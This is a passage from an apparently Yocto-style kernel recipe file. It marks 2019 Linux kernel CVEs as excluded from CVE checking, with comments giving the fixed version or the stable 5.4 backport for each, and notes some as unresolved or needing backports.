3610CVE_CHECK_WHITELIST += "CVE-2019-11811"
3611
3612# fixed-version: Fixed after version 5.1rc4
3613CVE_CHECK_WHITELIST += "CVE-2019-11815"
3614
3615# fixed-version: Fixed after version 5.2rc1
3616CVE_CHECK_WHITELIST += "CVE-2019-11833"
3617
3618# fixed-version: Fixed after version 5.2rc1
3619CVE_CHECK_WHITELIST += "CVE-2019-11884"
3620
3621# fixed-version: Fixed after version 5.2rc3
3622CVE_CHECK_WHITELIST += "CVE-2019-12378"
3623
3624# fixed-version: Fixed after version 5.3rc1
3625CVE_CHECK_WHITELIST += "CVE-2019-12379"
3626
3627# fixed-version: Fixed after version 5.2rc3
3628CVE_CHECK_WHITELIST += "CVE-2019-12380"
3629
3630# fixed-version: Fixed after version 5.2rc3
3631CVE_CHECK_WHITELIST += "CVE-2019-12381"
3632
3633# fixed-version: Fixed after version 5.3rc1
3634CVE_CHECK_WHITELIST += "CVE-2019-12382"
3635
3636# fixed-version: Fixed after version 5.3rc1
3637CVE_CHECK_WHITELIST += "CVE-2019-12454"
3638
3639# fixed-version: Fixed after version 5.3rc1
3640CVE_CHECK_WHITELIST += "CVE-2019-12455"
3641
3642# CVE-2019-12456 has no known resolution
3643
3644# fixed-version: Fixed after version 5.3rc1
3645CVE_CHECK_WHITELIST += "CVE-2019-12614"
3646
3647# fixed-version: Fixed after version 5.2rc4
3648CVE_CHECK_WHITELIST += "CVE-2019-12615"
3649
3650# fixed-version: Fixed after version 5.2rc7
3651CVE_CHECK_WHITELIST += "CVE-2019-12817"
3652
3653# fixed-version: Fixed after version 5.0
3654CVE_CHECK_WHITELIST += "CVE-2019-12818"
3655
3656# fixed-version: Fixed after version 5.0rc8
3657CVE_CHECK_WHITELIST += "CVE-2019-12819"
3658
3659# fixed-version: Fixed after version 4.18rc1
3660CVE_CHECK_WHITELIST += "CVE-2019-12881"
3661
3662# fixed-version: Fixed after version 5.2rc6
3663CVE_CHECK_WHITELIST += "CVE-2019-12984"
3664
3665# fixed-version: Fixed after version 5.2rc4
3666CVE_CHECK_WHITELIST += "CVE-2019-13233"
3667
3668# fixed-version: Fixed after version 5.2
3669CVE_CHECK_WHITELIST += "CVE-2019-13272"
3670
3671# fixed-version: Fixed after version 5.3rc1
3672CVE_CHECK_WHITELIST += "CVE-2019-13631"
3673
3674# fixed-version: Fixed after version 5.3rc2
3675CVE_CHECK_WHITELIST += "CVE-2019-13648"
3676
3677# fixed-version: Fixed after version 5.3rc1
3678CVE_CHECK_WHITELIST += "CVE-2019-14283"
3679
3680# fixed-version: Fixed after version 5.3rc1
3681CVE_CHECK_WHITELIST += "CVE-2019-14284"
3682
3683# cpe-stable-backport: Backported in 5.4.12
3684CVE_CHECK_WHITELIST += "CVE-2019-14615"
3685
3686# fixed-version: Fixed after version 4.17rc1
3687CVE_CHECK_WHITELIST += "CVE-2019-14763"
3688
3689# fixed-version: Fixed after version 5.3
3690CVE_CHECK_WHITELIST += "CVE-2019-14814"
3691
3692# fixed-version: Fixed after version 5.3
3693CVE_CHECK_WHITELIST += "CVE-2019-14815"
3694
3695# fixed-version: Fixed after version 5.3
3696CVE_CHECK_WHITELIST += "CVE-2019-14816"
3697
3698# fixed-version: Fixed after version 5.4rc1
3699CVE_CHECK_WHITELIST += "CVE-2019-14821"
3700
3701# fixed-version: Fixed after version 5.3
3702CVE_CHECK_WHITELIST += "CVE-2019-14835"
3703
3704# cpe-stable-backport: Backported in 5.4.12
3705CVE_CHECK_WHITELIST += "CVE-2019-14895"
3706
3707# cpe-stable-backport: Backported in 5.4.16
3708CVE_CHECK_WHITELIST += "CVE-2019-14896"
3709
3710# cpe-stable-backport: Backported in 5.4.16
3711CVE_CHECK_WHITELIST += "CVE-2019-14897"
3712
3713# CVE-2019-14898 has no known resolution
3714
3715# cpe-stable-backport: Backported in 5.4.11
3716CVE_CHECK_WHITELIST += "CVE-2019-14901"
3717
3718# fixed-version: Fixed after version 5.3rc8
3719CVE_CHECK_WHITELIST += "CVE-2019-15030"
3720
3721# fixed-version: Fixed after version 5.3rc8
3722CVE_CHECK_WHITELIST += "CVE-2019-15031"
3723
3724# fixed-version: Fixed after version 5.2rc2
3725CVE_CHECK_WHITELIST += "CVE-2019-15090"
3726
3727# fixed-version: Fixed after version 5.4rc1
3728CVE_CHECK_WHITELIST += "CVE-2019-15098"
3729
3730# cpe-stable-backport: Backported in 5.4rc1
3731CVE_CHECK_WHITELIST += "CVE-2019-15099"
3732
3733# fixed-version: Fixed after version 5.3rc5
3734CVE_CHECK_WHITELIST += "CVE-2019-15117"
3735
3736# fixed-version: Fixed after version 5.3rc5
3737CVE_CHECK_WHITELIST += "CVE-2019-15118"
3738
3739# fixed-version: Fixed after version 5.3rc1
3740CVE_CHECK_WHITELIST += "CVE-2019-15211"
3741
3742# fixed-version: Fixed after version 5.2rc3
3743CVE_CHECK_WHITELIST += "CVE-2019-15212"
3744
3745# fixed-version: Fixed after version 5.3rc1
3746CVE_CHECK_WHITELIST += "CVE-2019-15213"
3747
3748# fixed-version: Fixed after version 5.1rc6
3749CVE_CHECK_WHITELIST += "CVE-2019-15214"
3750
3751# fixed-version: Fixed after version 5.3rc1
3752CVE_CHECK_WHITELIST += "CVE-2019-15215"
3753
3754# fixed-version: Fixed after version 5.1
3755CVE_CHECK_WHITELIST += "CVE-2019-15216"
3756
3757# fixed-version: Fixed after version 5.3rc1
3758CVE_CHECK_WHITELIST += "CVE-2019-15217"
3759
3760# fixed-version: Fixed after version 5.2rc3
3761CVE_CHECK_WHITELIST += "CVE-2019-15218"
3762
3763# fixed-version: Fixed after version 5.2rc3
3764CVE_CHECK_WHITELIST += "CVE-2019-15219"
3765
3766# fixed-version: Fixed after version 5.3rc1
3767CVE_CHECK_WHITELIST += "CVE-2019-15220"
3768
3769# fixed-version: Fixed after version 5.2
3770CVE_CHECK_WHITELIST += "CVE-2019-15221"
3771
3772# fixed-version: Fixed after version 5.3rc3
3773CVE_CHECK_WHITELIST += "CVE-2019-15222"
3774
3775# fixed-version: Fixed after version 5.2rc3
3776CVE_CHECK_WHITELIST += "CVE-2019-15223"
3777
3778# CVE-2019-15239 has no known resolution
3779
3780# CVE-2019-15290 has no known resolution
3781
3782# cpe-stable-backport: Backported in 5.4.1
3783CVE_CHECK_WHITELIST += "CVE-2019-15291"
3784
3785# fixed-version: Fixed after version 5.1rc1
3786CVE_CHECK_WHITELIST += "CVE-2019-15292"
3787
3788# fixed-version: Fixed after version 5.3
3789CVE_CHECK_WHITELIST += "CVE-2019-15504"
3790
3791# fixed-version: Fixed after version 5.4rc1
3792CVE_CHECK_WHITELIST += "CVE-2019-15505"
3793
3794# fixed-version: Fixed after version 5.3rc6
3795CVE_CHECK_WHITELIST += "CVE-2019-15538"
3796
3797# fixed-version: Fixed after version 5.1
3798CVE_CHECK_WHITELIST += "CVE-2019-15666"
3799
3800# CVE-2019-15791 has no known resolution
3801
3802# CVE-2019-15792 has no known resolution
3803
3804# CVE-2019-15793 has no known resolution
3805
3806# CVE-2019-15794 needs backporting (fixed from 5.12)
3807
3808# fixed-version: Fixed after version 5.2rc3
3809CVE_CHECK_WHITELIST += "CVE-2019-15807"
3810
3811# CVE-2019-15902 has no known resolution
3812
3813# fixed-version: Fixed after version 5.1rc1
3814CVE_CHECK_WHITELIST += "CVE-2019-15916"
3815
3816# fixed-version: Fixed after version 5.1rc1
3817CVE_CHECK_WHITELIST += "CVE-2019-15917"
3818
3819# fixed-version: Fixed after version 5.1rc6
3820CVE_CHECK_WHITELIST += "CVE-2019-15918"
3821
3822# fixed-version: Fixed after version 5.1rc6
3823CVE_CHECK_WHITELIST += "CVE-2019-15919"
3824
3825# fixed-version: Fixed after version 5.1rc6
3826CVE_CHECK_WHITELIST += "CVE-2019-15920"
3827
3828# fixed-version: Fixed after version 5.1rc3
3829CVE_CHECK_WHITELIST += "CVE-2019-15921"
3830
3831# fixed-version: Fixed after version 5.1rc4
3832CVE_CHECK_WHITELIST += "CVE-2019-15922"
3833
3834# fixed-version: Fixed after version 5.1rc4
3835CVE_CHECK_WHITELIST += "CVE-2019-15923"
3836
3837# fixed-version: Fixed after version 5.1rc4
3838CVE_CHECK_WHITELIST += "CVE-2019-15924"
3839
3840# fixed-version: Fixed after version 5.3rc1
3841CVE_CHECK_WHITELIST += "CVE-2019-15925"
3842
3843# fixed-version: Fixed after version 5.3rc1
3844CVE_CHECK_WHITELIST += "CVE-2019-15926"
3845
3846# fixed-version: Fixed after version 5.0rc2
3847CVE_CHECK_WHITELIST += "CVE-2019-15927"
3848
3849# CVE-2019-16089 has no known resolution
3850
3851# cpe-stable-backport: Backported in 5.4.7
3852CVE_CHECK_WHITELIST += "CVE-2019-16229"
3853
3854# cpe-stable-backport: Backported in 5.4.7
3855CVE_CHECK_WHITELIST += "CVE-2019-16230"
3856
3857# fixed-version: Fixed after version 5.4rc6
3858CVE_CHECK_WHITELIST += "CVE-2019-16231"
3859
3860# cpe-stable-backport: Backported in 5.4.7
3861CVE_CHECK_WHITELIST += "CVE-2019-16232"
3862
3863# fixed-version: Fixed after version 5.4rc5
3864CVE_CHECK_WHITELIST += "CVE-2019-16233"
3865
3866# fixed-version: Fixed after version 5.4rc4
3867CVE_CHECK_WHITELIST += "CVE-2019-16234"
3868
3869# fixed-version: Fixed after version 5.1rc1
3870CVE_CHECK_WHITELIST += "CVE-2019-16413"
3871
3872# fixed-version: Fixed after version 5.3rc7
3873CVE_CHECK_WHITELIST += "CVE-2019-16714"
3874
3875# fixed-version: Fixed after version 5.4rc2
3876CVE_CHECK_WHITELIST += "CVE-2019-16746"
3877
3878# fixed-version: Fixed after version 4.17rc1
3879CVE_CHECK_WHITELIST += "CVE-2019-16921"
3880
3881# fixed-version: Fixed after version 5.0
3882CVE_CHECK_WHITELIST += "CVE-2019-16994"
3883
3884# fixed-version: Fixed after version 5.1rc1
3885CVE_CHECK_WHITELIST += "CVE-2019-16995"
3886
3887# fixed-version: Fixed after version 5.4rc1
3888CVE_CHECK_WHITELIST += "CVE-2019-17052"
3889
3890# fixed-version: Fixed after version 5.4rc1
3891CVE_CHECK_WHITELIST += "CVE-2019-17053"
3892
3893# fixed-version: Fixed after version 5.4rc1
3894CVE_CHECK_WHITELIST += "CVE-2019-17054"
3895
3896# fixed-version: Fixed after version 5.4rc1
3897CVE_CHECK_WHITELIST += "CVE-2019-17055"
3898
3899# fixed-version: Fixed after version 5.4rc1
3900CVE_CHECK_WHITELIST += "CVE-2019-17056"
3901
3902# fixed-version: Fixed after version 5.4rc3
3903CVE_CHECK_WHITELIST += "CVE-2019-17075"
3904
3905# fixed-version: Fixed after version 5.4rc4
3906CVE_CHECK_WHITELIST += "CVE-2019-17133"
3907
3908# fixed-version: Fixed after version 5.3rc1
3909CVE_CHECK_WHITELIST += "CVE-2019-17351"
3910
3911# fixed-version: Fixed after version 5.4rc6
3912CVE_CHECK_WHITELIST += "CVE-2019-17666"
3913
3914# fixed-version: Fixed after version 5.4rc1
3915CVE_CHECK_WHITELIST += "CVE-2019-18198"
3916
3917# fixed-version: Fixed after version 5.4rc6
3918CVE_CHECK_WHITELIST += "CVE-2019-18282"
3919
3920# cpe-stable-backport: Backported in 5.4.1
3921CVE_CHECK_WHITELIST += "CVE-2019-18660"
3922
3923# fixed-version: Fixed after version 4.17rc5
3924CVE_CHECK_WHITELIST += "CVE-2019-18675"
3925
3926# CVE-2019-18680 has no known resolution
3927
3928# cpe-stable-backport: Backported in 5.4.1
3929CVE_CHECK_WHITELIST += "CVE-2019-18683"
3930
3931# cpe-stable-backport: Backported in 5.4.7
3932CVE_CHECK_WHITELIST += "CVE-2019-18786"
3933
3934# fixed-version: Fixed after version 5.1rc7
3935CVE_CHECK_WHITELIST += "CVE-2019-18805"
3936
3937# fixed-version: Fixed after version 5.4rc2
3938CVE_CHECK_WHITELIST += "CVE-2019-18806"
3939
3940# fixed-version: Fixed after version 5.4rc2
3941CVE_CHECK_WHITELIST += "CVE-2019-18807"
3942
3943# cpe-stable-backport: Backported in 5.4.56
3944CVE_CHECK_WHITELIST += "CVE-2019-18808"
3945
3946# cpe-stable-backport: Backported in 5.4.9
3947CVE_CHECK_WHITELIST += "CVE-2019-18809"
3948
3949# fixed-version: Fixed after version 5.4rc2
3950CVE_CHECK_WHITELIST += "CVE-2019-18810"
3951
3952# fixed-version: Fixed after version 5.4rc7
3953CVE_CHECK_WHITELIST += "CVE-2019-18811"
3954
3955# fixed-version: Fixed after version 5.4rc7
3956CVE_CHECK_WHITELIST += "CVE-2019-18812"
3957
3958# fixed-version: Fixed after version 5.4rc6
3959CVE_CHECK_WHITELIST += "CVE-2019-18813"
3960
3961# cpe-stable-backport: Backported in 5.4.43
3962CVE_CHECK_WHITELIST += "CVE-2019-18814"
3963
3964# fixed-version: Fixed after version 5.1rc1
3965CVE_CHECK_WHITELIST += "CVE-2019-18885"
3966
3967# fixed-version: Fixed after version 5.4rc1
3968CVE_CHECK_WHITELIST += "CVE-2019-19036"
3969
3970# cpe-stable-backport: Backported in 5.4.7
3971CVE_CHECK_WHITELIST += "CVE-2019-19037"
3972
3973# cpe-stable-backport: Backported in 5.4.33
3974CVE_CHECK_WHITELIST += "CVE-2019-19039"
3975
3976# cpe-stable-backport: Backported in 5.4.14
3977CVE_CHECK_WHITELIST += "CVE-2019-19043"
3978
3979# fixed-version: Fixed after version 5.4rc6
3980CVE_CHECK_WHITELIST += "CVE-2019-19044"
3981
3982# fixed-version: Fixed after version 5.4rc6
3983CVE_CHECK_WHITELIST += "CVE-2019-19045"
3984
3985# cpe-stable-backport: Backported in 5.4.15
3986CVE_CHECK_WHITELIST += "CVE-2019-19046"
3987
3988# fixed-version: Fixed after version 5.4rc6
3989CVE_CHECK_WHITELIST += "CVE-2019-19047"
3990
3991# fixed-version: Fixed after version 5.4rc3
3992CVE_CHECK_WHITELIST += "CVE-2019-19048"
3993
3994# fixed-version: Fixed after version 5.4rc5
3995CVE_CHECK_WHITELIST += "CVE-2019-19049"
3996
3997# cpe-stable-backport: Backported in 5.4.3
3998CVE_CHECK_WHITELIST += "CVE-2019-19050"
3999
4000# fixed-version: Fixed after version 5.4rc6
4001CVE_CHECK_WHITELIST += "CVE-2019-19051"
4002
4003# fixed-version: Fixed after version 5.4rc7
4004CVE_CHECK_WHITELIST += "CVE-2019-19052"
4005
4006# cpe-stable-backport: Backported in 5.4.12
4007CVE_CHECK_WHITELIST += "CVE-2019-19053"
4008
4009# cpe-stable-backport: Backported in 5.4.56
4010CVE_CHECK_WHITELIST += "CVE-2019-19054"
4011
4012# fixed-version: Fixed after version 5.4rc4
4013CVE_CHECK_WHITELIST += "CVE-2019-19055"
4014
4015# cpe-stable-backport: Backported in 5.4.12
4016CVE_CHECK_WHITELIST += "CVE-2019-19056"
4017
4018# cpe-stable-backport: Backported in 5.4.7
4019CVE_CHECK_WHITELIST += "CVE-2019-19057"
4020
4021# fixed-version: Fixed after version 5.4rc4
4022CVE_CHECK_WHITELIST += "CVE-2019-19058"
4023
4024# fixed-version: Fixed after version 5.4rc4
4025CVE_CHECK_WHITELIST += "CVE-2019-19059"
4026
4027# fixed-version: Fixed after version 5.4rc3
4028CVE_CHECK_WHITELIST += "CVE-2019-19060"
4029
4030# fixed-version: Fixed after version 5.4rc3
4031CVE_CHECK_WHITELIST += "CVE-2019-19061"
4032
4033# cpe-stable-backport: Backported in 5.4.3
4034CVE_CHECK_WHITELIST += "CVE-2019-19062"
4035
4036# cpe-stable-backport: Backported in 5.4.7
4037CVE_CHECK_WHITELIST += "CVE-2019-19063"
4038
4039# cpe-stable-backport: Backported in 5.4.13
4040CVE_CHECK_WHITELIST += "CVE-2019-19064"
4041
4042# fixed-version: Fixed after version 5.4rc3
4043CVE_CHECK_WHITELIST += "CVE-2019-19065"
4044
4045# cpe-stable-backport: Backported in 5.4.12
4046CVE_CHECK_WHITELIST += "CVE-2019-19066"
4047
4048# fixed-version: Fixed after version 5.4rc2
4049CVE_CHECK_WHITELIST += "CVE-2019-19067"
4050
4051# cpe-stable-backport: Backported in 5.4.12
4052CVE_CHECK_WHITELIST += "CVE-2019-19068"
4053
4054# fixed-version: Fixed after version 5.4rc3
4055CVE_CHECK_WHITELIST += "CVE-2019-19069"
4056
4057# cpe-stable-backport: Backported in 5.4.7
4058CVE_CHECK_WHITELIST += "CVE-2019-19070"
4059
4060# cpe-stable-backport: Backported in 5.4.3
4061CVE_CHECK_WHITELIST += "CVE-2019-19071"
4062
4063# fixed-version: Fixed after version 5.4rc1
4064CVE_CHECK_WHITELIST += "CVE-2019-19072"
4065
4066# fixed-version: Fixed after version 5.4rc1
4067CVE_CHECK_WHITELIST += "CVE-2019-19073"
4068
4069# fixed-version: Fixed after version 5.4rc1
4070CVE_CHECK_WHITELIST += "CVE-2019-19074"
4071
4072# fixed-version: Fixed after version 5.4rc2
4073CVE_CHECK_WHITELIST += "CVE-2019-19075"
4074
4075# fixed-version: Fixed after version 5.4rc1
4076CVE_CHECK_WHITELIST += "CVE-2019-19076"
4077
4078# fixed-version: Fixed after version 5.4rc1
4079CVE_CHECK_WHITELIST += "CVE-2019-19077"
4080
4081# cpe-stable-backport: Backported in 5.4.12
4082CVE_CHECK_WHITELIST += "CVE-2019-19078"
4083
4084# fixed-version: Fixed after version 5.3
4085CVE_CHECK_WHITELIST += "CVE-2019-19079"
4086
4087# fixed-version: Fixed after version 5.4rc1
4088CVE_CHECK_WHITELIST += "CVE-2019-19080"
4089
4090# fixed-version: Fixed after version 5.4rc1
4091CVE_CHECK_WHITELIST += "CVE-2019-19081"
4092
4093# fixed-version: Fixed after version 5.4rc1
4094CVE_CHECK_WHITELIST += "CVE-2019-19082"
4095
4096# fixed-version: Fixed after version 5.4rc2
4097CVE_CHECK_WHITELIST += "CVE-2019-19083"
4098
4099# fixed-version: Fixed after version 5.1rc3
4100CVE_CHECK_WHITELIST += "CVE-2019-19227"
4101
4102# fixed-version: only affects 5.5rc1 onwards
4103CVE_CHECK_WHITELIST += "CVE-2019-19241"
4104
4105# cpe-stable-backport: Backported in 5.4.3
4106CVE_CHECK_WHITELIST += "CVE-2019-19252"
4107
4108# fixed-version: Fixed after version 5.4rc1
4109CVE_CHECK_WHITELIST += "CVE-2019-19318"
4110
4111# fixed-version: Fixed after version 5.2rc1
4112CVE_CHECK_WHITELIST += "CVE-2019-19319"
4113
4114# cpe-stable-backport: Backported in 5.4.3
4115CVE_CHECK_WHITELIST += "CVE-2019-19332"
4116
4117# cpe-stable-backport: Backported in 5.4.3
4118CVE_CHECK_WHITELIST += "CVE-2019-19338"
4119
4120# cpe-stable-backport: Backported in 5.4.33
4121CVE_CHECK_WHITELIST += "CVE-2019-19377"
4122
4123# CVE-2019-19378 has no known resolution
4124
4125# cpe-stable-backport: Backported in 5.4.4
4126CVE_CHECK_WHITELIST += "CVE-2019-19447"
4127
4128# cpe-stable-backport: Backported in 5.4.60
4129CVE_CHECK_WHITELIST += "CVE-2019-19448"
4130
4131# CVE-2019-19449 needs backporting (fixed from 5.10rc1)
4132
4133# cpe-stable-backport: Backported in 5.4.45
4134CVE_CHECK_WHITELIST += "CVE-2019-19462"
4135
4136# fixed-version: Fixed after version 5.4rc3
4137CVE_CHECK_WHITELIST += "CVE-2019-19523"
4138
4139# fixed-version: Fixed after version 5.4rc8
4140CVE_CHECK_WHITELIST += "CVE-2019-19524"
4141
4142# fixed-version: Fixed after version 5.4rc2
4143CVE_CHECK_WHITELIST += "CVE-2019-19525"
4144
4145# fixed-version: Fixed after version 5.4rc4
4146CVE_CHECK_WHITELIST += "CVE-2019-19526"
4147
4148# fixed-version: Fixed after version 5.3rc4
4149CVE_CHECK_WHITELIST += "CVE-2019-19527"
4150
4151# fixed-version: Fixed after version 5.4rc3
4152CVE_CHECK_WHITELIST += "CVE-2019-19528"
4153
4154# fixed-version: Fixed after version 5.4rc7
4155CVE_CHECK_WHITELIST += "CVE-2019-19529"
4156
4157# fixed-version: Fixed after version 5.3rc5
4158CVE_CHECK_WHITELIST += "CVE-2019-19530"
4159
4160# fixed-version: Fixed after version 5.3rc4
4161CVE_CHECK_WHITELIST += "CVE-2019-19531"
4162
4163# fixed-version: Fixed after version 5.4rc6
4164CVE_CHECK_WHITELIST += "CVE-2019-19532"
4165
4166# fixed-version: Fixed after version 5.4rc1
4167CVE_CHECK_WHITELIST += "CVE-2019-19533"
4168
4169# fixed-version: Fixed after version 5.4rc7
4170CVE_CHECK_WHITELIST += "CVE-2019-19534"
4171
4172# fixed-version: Fixed after version 5.3rc4
4173CVE_CHECK_WHITELIST += "CVE-2019-19535"
4174
4175# fixed-version: Fixed after version 5.3rc4
4176CVE_CHECK_WHITELIST += "CVE-2019-19536"
4177
4178# fixed-version: Fixed after version 5.3rc5
4179CVE_CHECK_WHITELIST += "CVE-2019-19537"
4180
4181# fixed-version: Fixed after version 5.2rc1
4182CVE_CHECK_WHITELIST += "CVE-2019-19543"
4183
4184# cpe-stable-backport: Backported in 5.4.2
4185CVE_CHECK_WHITELIST += "CVE-2019-19602"
4186
4187# cpe-stable-backport: Backported in 5.4.2
4188CVE_CHECK_WHITELIST += "CVE-2019-19767"
4189
4190# cpe-stable-backport: Backported in 5.4.24
4191CVE_CHECK_WHITELIST += "CVE-2019-19768"
4192
4193# cpe-stable-backport: Backported in 5.4.28
4194CVE_CHECK_WHITELIST += "CVE-2019-19769"
4195
4196# cpe-stable-backport: Backported in 5.4.59
4197CVE_CHECK_WHITELIST += "CVE-2019-19770"
4198
4199# fixed-version: Fixed after version 5.4rc7
4200CVE_CHECK_WHITELIST += "CVE-2019-19807"
4201
4202# fixed-version: Fixed after version 5.2rc1
4203CVE_CHECK_WHITELIST += "CVE-2019-19813"
4204
4205# CVE-2019-19814 has no known resolution
4206
4207# fixed-version: Fixed after version 5.3rc1
4208CVE_CHECK_WHITELIST += "CVE-2019-19815"
4209
4210# fixed-version: Fixed after version 5.2rc1
4211CVE_CHECK_WHITELIST += "CVE-2019-19816"
4212
4213# fixed-version: Fixed after version 5.4rc1
4214CVE_CHECK_WHITELIST += "CVE-2019-19922"
4215
4216# fixed-version: Fixed after version 5.1rc6
4217CVE_CHECK_WHITELIST += "CVE-2019-19927"
4218
4219# cpe-stable-backport: Backported in 5.4.7
4220CVE_CHECK_WHITELIST += "CVE-2019-19947"
4221
4222# cpe-stable-backport: Backported in 5.4.9
4223CVE_CHECK_WHITELIST += "CVE-2019-19965"
4224
4225# fixed-version: Fixed after version 5.2rc1
4226CVE_CHECK_WHITELIST += "CVE-2019-19966"
4227
4228# fixed-version: Fixed after version 5.1rc3
4229CVE_CHECK_WHITELIST += "CVE-2019-1999"
4230
4231# fixed-version: Fixed after version 5.1rc3
4232CVE_CHECK_WHITELIST += "CVE-2019-20054"
4233
4234# fixed-version: Fixed after version 5.2rc1
4235CVE_CHECK_WHITELIST += "CVE-2019-20095"
4236
4237# fixed-version: Fixed after version 5.1rc4
4238CVE_CHECK_WHITELIST += "CVE-2019-20096"
4239
4240# fixed-version: Fixed after version 4.16rc1
4241CVE_CHECK_WHITELIST += "CVE-2019-2024"
4242
4243# fixed-version: Fixed after version 4.20rc5
4244CVE_CHECK_WHITELIST += "CVE-2019-2025"
4245
4246# fixed-version: Fixed after version 5.4rc1
4247CVE_CHECK_WHITELIST += "CVE-2019-20422"
4248
4249# fixed-version: Fixed after version 4.8rc1
4250CVE_CHECK_WHITELIST += "CVE-2019-2054"
4251
4252# cpe-stable-backport: Backported in 5.4.12
4253CVE_CHECK_WHITELIST += "CVE-2019-20636"
4254
4255# CVE-2019-20794 has no known resolution
4256
4257# fixed-version: Fixed after version 5.2rc1
4258CVE_CHECK_WHITELIST += "CVE-2019-20806"
4259
4260# cpe-stable-backport: Backported in 5.4.48
4261CVE_CHECK_WHITELIST += "CVE-2019-20810"
4262
4263# fixed-version: Fixed after version 5.1rc3
4264CVE_CHECK_WHITELIST += "CVE-2019-20811"
4265
4266# cpe-stable-backport: Backported in 5.4.7
4267CVE_CHECK_WHITELIST += "CVE-2019-20812"
4268
4269# fixed-version: Fixed after version 5.4rc1
4270CVE_CHECK_WHITELIST += "CVE-2019-20908"
4271
4272# fixed-version: Fixed after version 5.3rc2
4273CVE_CHECK_WHITELIST += "CVE-2019-20934"
4274
4275# fixed-version: Fixed after version 5.1rc1
4276CVE_CHECK_WHITELIST += "CVE-2019-2101"
4277
4278# fixed-version: Fixed after version 5.2rc1
4279CVE_CHECK_WHITELIST += "CVE-2019-2181"
4280
4281# fixed-version: Fixed after version 4.16rc3
4282CVE_CHECK_WHITELIST += "CVE-2019-2182"
4283
4284# fixed-version: Fixed after version 5.2rc6
4285CVE_CHECK_WHITELIST += "CVE-2019-2213"
4286
4287# fixed-version: Fixed after version 5.3rc2
4288CVE_CHECK_WHITELIST += "CVE-2019-2214"
4289
4290# fixed-version: Fixed after version 4.16rc1
4291CVE_CHECK_WHITELIST += "CVE-2019-2215"
4292
4293# fixed-version: Fixed after version 5.2rc4
4294CVE_CHECK_WHITELIST += "CVE-2019-25044"
4295
4296# fixed-version: Fixed after version 5.1
4297CVE_CHECK_WHITELIST += "CVE-2019-25045"
4298
4299# fixed-version: Fixed after version 5.0
4300CVE_CHECK_WHITELIST += "CVE-2019-25160"
4301
4302# cpe-stable-backport: Backported in 5.4.211
4303CVE_CHECK_WHITELIST += "CVE-2019-25162"
4304
4305# cpe-stable-backport: Backported in 5.4.19
4306CVE_CHECK_WHITELIST += "CVE-2019-3016"
4307
4308# fixed-version: Fixed after version 5.1rc1
4309CVE_CHECK_WHITELIST += "CVE-2019-3459"
4310
4311# fixed-version: Fixed after version 5.1rc1
4312CVE_CHECK_WHITELIST += "CVE-2019-3460"
4313
4314# fixed-version: Fixed after version 5.0rc3
4315CVE_CHECK_WHITELIST += "CVE-2019-3701"
4316
4317# fixed-version: Fixed after version 5.0rc6
4318CVE_CHECK_WHITELIST += "CVE-2019-3819"
4319
4320# fixed-version: Fixed after version 3.18rc1
4321CVE_CHECK_WHITELIST += "CVE-2019-3837"
4322
4323# fixed-version: Fixed after version 5.2rc6
4324CVE_CHECK_WHITELIST += "CVE-2019-3846"
4325
4326# fixed-version: Fixed after version 5.2rc1
4327CVE_CHECK_WHITELIST += "CVE-2019-3874"
4328
4329# fixed-version: Fixed after version 5.1rc4
4330CVE_CHECK_WHITELIST += "CVE-2019-3882"
4331
4332# fixed-version: Fixed after version 5.1rc4
4333CVE_CHECK_WHITELIST += "CVE-2019-3887"
4334
4335# fixed-version: Fixed after version 5.1rc6
4336CVE_CHECK_WHITELIST += "CVE-2019-3892"
4337
4338# fixed-version: Fixed after version 2.6.35rc1
4339CVE_CHECK_WHITELIST += "CVE-2019-3896"
4340
4341# fixed-version: Fixed after version 5.2rc4
4342CVE_CHECK_WHITELIST += "CVE-2019-3900"
4343
4344# fixed-version: Fixed after version 4.6rc6
4345CVE_CHECK_WHITELIST += "CVE-2019-3901"
4346
4347# fixed-version: Fixed after version 5.3
4348CVE_CHECK_WHITELIST += "CVE-2019-5108"
4349
4350# Skipping CVE-2019-5489, no affected_versions
4351
4352# fixed-version: Fixed after version 5.0rc2
4353CVE_CHECK_WHITELIST += "CVE-2019-6133"
4354
4355# fixed-version: Fixed after version 5.0rc6
4356CVE_CHECK_WHITELIST += "CVE-2019-6974"
4357
4358# fixed-version: Fixed after version 5.0rc6
4359CVE_CHECK_WHITELIST += "CVE-2019-7221"
4360
4361# fixed-version: Fixed after version 5.0rc6
4362CVE_CHECK_WHITELIST += "CVE-2019-7222"
4363
4364# fixed-version: Fixed after version 5.0rc3
4365CVE_CHECK_WHITELIST += "CVE-2019-7308"
4366
4367# fixed-version: Fixed after version 5.0rc8
4368CVE_CHECK_WHITELIST += "CVE-2019-8912"
4369
4370# fixed-version: Fixed after version 5.0rc6
4371CVE_CHECK_WHITELIST += "CVE-2019-8956"
4372
4373# fixed-version: Fixed after version 5.1rc1
4374CVE_CHECK_WHITELIST += "CVE-2019-8980"
4375
4376# fixed-version: Fixed after version 5.0rc4
4377CVE_CHECK_WHITELIST += "CVE-2019-9003"
4378
4379# fixed-version: Fixed after version 5.0rc7
4380CVE_CHECK_WHITELIST += "CVE-2019-9162"
4381
4382# fixed-version: Fixed after version 5.0
4383CVE_CHECK_WHITELIST += "CVE-2019-9213"
4384
4385# fixed-version: Fixed after version 5.0rc1
4386CVE_CHECK_WHITELIST += "CVE-2019-9245"
4387
4388# fixed-version: Fixed after version 4.15rc2
4389CVE_CHECK_WHITELIST += "CVE-2019-9444"
4390
4391# fixed-version: Fixed after version 5.1rc1
4392CVE_CHECK_WHITELIST += "CVE-2019-9445"
4393
4394# fixed-version: Fixed after version 5.2rc1
4395CVE_CHECK_WHITELIST += "CVE-2019-9453"
4396
4397# fixed-version: Fixed after version 4.15rc9
4398CVE_CHECK_WHITELIST += "CVE-2019-9454"
4399
4400# fixed-version: Fixed after version 5.0rc1
4401CVE_CHECK_WHITELIST += "CVE-2019-9455"
4402
4403# fixed-version: Fixed after version 4.16rc6
4404CVE_CHECK_WHITELIST += "CVE-2019-9456"
4405
4406# fixed-version: Fixed after version 4.13rc1
4407CVE_CHECK_WHITELIST += "CVE-2019-9457"
4408
4409# fixed-version: Fixed after version 4.19rc7
4410CVE_CHECK_WHITELIST += "CVE-2019-9458"
4411
4412# fixed-version: Fixed after version 5.1rc1
4413CVE_CHECK_WHITELIST += "CVE-2019-9466"
4414
4415# fixed-version: Fixed after version 5.1rc1
4416CVE_CHECK_WHITELIST += "CVE-2019-9500"
4417
4418# fixed-version: Fixed after version 5.1rc1
4419CVE_CHECK_WHITELIST += "CVE-2019-9503"
4420
4421# fixed-version: Fixed after version 5.2
4422CVE_CHECK_WHITELIST += "CVE-2019-9506"
4423
